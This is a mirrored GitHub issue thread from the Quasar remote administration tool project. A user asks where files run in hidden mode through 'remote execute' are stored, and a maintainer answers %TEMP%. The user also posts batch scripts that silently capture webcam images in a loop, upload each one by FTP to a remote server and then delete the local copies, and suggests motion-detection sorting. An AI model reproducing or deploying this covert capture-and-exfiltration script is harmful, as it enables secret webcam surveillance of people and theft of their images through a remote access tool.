[GH-ISSUE #397] Where is remote execute downloaded in? #191

Closed
opened 2026-02-27 15:49:16 +03:00 by kerem · 6 comments
Owner

Originally created by @webiummedia on GitHub (Sep 17, 2015).
Original GitHub issue: https://github.com/quasar/Quasar/issues/397

I just used the remote execute file to download and execute a exe in hidden mode. Where's the file located at? I need to move it via command line.

Originally created by @webiummedia on GitHub (Sep 17, 2015). Original GitHub issue: https://github.com/quasar/Quasar/issues/397 I just used the remote execute file to download and execute a exe in hidden mode. Where's the file located at? I need to move it via command line.
kerem 2026-02-27 15:49:16 +03:00
  • closed this issue
  • added the
    question
    label
Author
Owner

@webiummedia commented on GitHub (Sep 17, 2015):

Would be nice if we could specify the directory to download in ...

<!-- gh-comment-id:141118634 --> @webiummedia commented on GitHub (Sep 17, 2015): Would be nice if we could specify the directory to download in ...
Author
Owner

@webiummedia commented on GitHub (Sep 17, 2015):

Actually, i just noticed we can drag and drop in the file manager lol
Take a look at this: https://github.com/tedburke/CommandCam
Works great. you just type commandcam in the folder the exe is in and it creates a webcam image

<!-- gh-comment-id:141120028 --> @webiummedia commented on GitHub (Sep 17, 2015): Actually, i just noticed we can drag and drop in the file manager lol Take a look at this: https://github.com/tedburke/CommandCam Works great. you just type commandcam in the folder the exe is in and it creates a webcam image
Author
Owner

@webiummedia commented on GitHub (Sep 17, 2015):

Something like this and we get an image every few seconds =)

@echo off
:begin
C:\CommandCam.exe /delay 5000 /filename C:%time:-11,2%%time:-8,2%%time:~-5,2%.bmp
goto begin

<!-- gh-comment-id:141126846 --> @webiummedia commented on GitHub (Sep 17, 2015): Something like this and we get an image every few seconds =) @echo off :begin C:\CommandCam.exe /delay 5000 /filename C:\%time:~-11,2%%time:~-8,2%%time:~-5,2%.bmp goto begin
Author
Owner

@webiummedia commented on GitHub (Sep 17, 2015):

FTP the image to remote server like this then delete the file

@echo off

:begin

set FileName=Build-%date%-%time:~0,2%-%time:~3,2%-%time:~6,2%

C:\CommandCam.exe /delay 50000 /filename C:%FileName%.bmp

echo user **> ftpcmd.dat
echo *
*>> ftpcmd.dat
echo bin>> ftpcmd.dat
echo put C:%FileName%.bmp>> ftpcmd.dat
echo quit>> ftpcmd.dat
ftp -n -s:ftpcmd.dat x.x.x.x
del ftpcmd.dat
DEL C:%FileName%.bmp

goto begin

<!-- gh-comment-id:141139323 --> @webiummedia commented on GitHub (Sep 17, 2015): FTP the image to remote server like this then delete the file @echo off :begin set FileName=Build-%date%-%time:~0,2%-%time:~3,2%-%time:~6,2% C:\CommandCam.exe /delay 50000 /filename C:\%FileName%.bmp echo user _**> ftpcmd.dat echo *_*>> ftpcmd.dat echo bin>> ftpcmd.dat echo put C:\%FileName%.bmp>> ftpcmd.dat echo quit>> ftpcmd.dat ftp -n -s:ftpcmd.dat x.x.x.x del ftpcmd.dat DEL C:\%FileName%.bmp goto begin
Author
Owner

@webiummedia commented on GitHub (Sep 17, 2015):

Then for those intrested, you can use something like http://sourceforge.net/projects/phpmotiondetect/ to sort out the images and keep only those that are not similar (motion detect)

<!-- gh-comment-id:141140466 --> @webiummedia commented on GitHub (Sep 17, 2015): Then for those intrested, you can use something like http://sourceforge.net/projects/phpmotiondetect/ to sort out the images and keep only those that are not similar (motion detect)
Author
Owner

@MaxXor commented on GitHub (Sep 17, 2015):

@webiummedia Downloaded files are located in %TEMP%.

<!-- gh-comment-id:141163435 --> @MaxXor commented on GitHub (Sep 17, 2015): @webiummedia Downloaded files are located in `%TEMP%`.
Sign in to join this conversation.
No milestone
No project
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
starred/Quasar#191
No description provided.